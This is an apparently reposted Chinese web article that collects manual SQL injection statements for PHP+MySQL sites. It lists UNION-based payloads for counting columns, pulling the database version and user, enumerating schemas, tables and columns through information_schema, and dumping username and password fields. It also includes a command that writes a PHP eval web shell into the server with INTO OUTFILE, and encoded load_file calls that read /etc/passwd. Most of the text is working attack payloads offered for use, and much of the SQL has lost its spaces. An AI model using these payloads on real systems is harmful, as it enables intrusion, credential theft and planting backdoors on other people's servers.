PHP+MySQL 手工注入语句大全推荐

2020-03-24 16:07:46

字体：大中小

来源：转载

供稿：网友

我PHP手工太菜了，无奈只能补下PHPMYSQL手工注射，把收集总结的资料分享下。FTP　　暴字段长度　　Orderbynum/*　　匹配字段　　and1=1unionselect1,2,3,4,5…….n/*　　暴字段位置　　and1=2unionselect1,2,3,4,5…..n/*　　利用内置函数暴数据库信息　　version()database()user()　　不用猜解可用字段暴数据库信息(有些网站不适用):　　and1=2unionallselectversion()/*　　and1=2unionallselectdatabase()/*　　and1=2unionallselectuser()/*　　操作系统信息：　　and1=2unionallselect@@global.version_compile_osfrommysql.user/*　　数据库权限：　　andord(mid(user(),1,1))=114/*返回正常说明为root　　暴库(mysql>5.0)　　Mysql5以上有内置库information_schema，存储着mysql的所有数据库和表结构信息　　and1=2unionselect1,2,3,SCHEMA_NAME,5,6,7,8,9,10frominformation_schema.SCHEMATAlimit0,1　　猜表　　and1=2unionselect1,2,3,TABLE_NAME,5,6,7,8,9,10frominformation_schema.TABLESwhereTABLE_SCHEMA=数据库（十六进制）limit0（开始的记录，0为第一个开始记录）,1（显示1条记录）—　　猜字段　　and1=2Unionselect1,2,3,COLUMN_NAME,5,6,7,8,9,10frominformation_schema.COLUMNSwhereTABLE_NAME=表名（十六进制）limit0,1　　暴密码　　and1=2Unionselect1,2,3,用户名段,5,6,7,密码段,8,9from表名limit0,1　　高级用法（一个可用字段显示两个数据内容）：　　Unionselect1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9from表名limit0,1　　直接写马(Root权限)　　条件：1、知道站点物理路径　　2、有足够大的权限（可以用select….frommysql.user测试）　　3、magic_quotes_gpc()=OFF　　select‘<?phpeval($_POST[cmd])?>'intooutfile‘物理路径'　　and1=2unionallselect一句话HEX值intooutfile'路径'　　load_file()常用路径：　　1、replace(load_file(0×2F6574632F706173737764),0×3c,0×20)　　2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))　　上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如“<”替换成”空格”返回的是网页.而无法查看到代码.

郑重声明：本文版权归原作者所有，转载文章仅为传播更多信息之目的，如作者信息标记有误，请第一时间联系我们修改或删除，多谢。

上一篇：phpmyadmin1045错误

下一篇：phpamqp消息队列RabbitMQ交换器类型广播fanout(四)